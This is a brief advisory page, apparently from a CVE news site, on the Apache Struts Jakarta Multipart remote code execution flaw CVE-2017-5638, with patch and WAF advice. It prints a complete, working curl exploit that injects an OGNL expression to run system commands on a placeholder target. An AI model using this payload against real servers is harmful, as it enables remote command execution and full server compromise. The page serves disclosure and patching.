Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious `Content-Type` header is sent with an invalid value. The flawed exception handling mechanism within the file upload logic incorrectly processes the error message. An attacker can embed an Object-Graph Navigation Language (OGNL) expression within the malformed `Content-Type` header. The Struts framework attempts to evaluate this expression while generating the error message, leading to improper code execution. This allows the attacker to submit a crafted HTTP request that bypasses security controls. The server-side OGNL evaluation executes the attacker’s payload with the application’s privileges, permitting full system command execution on the underlying server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch available.

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action

How Exploit:

Craft malicious Content-Type header containing OGNL expression. Send HTTP request to vulnerable Struts endpoint. OGNL expression executes system commands.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1. Apply vendor-provided patch. Implement WAF rules filtering malicious OGNL patterns.

Impact:

Complete server compromise. Arbitrary command execution. Unauthorized data access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top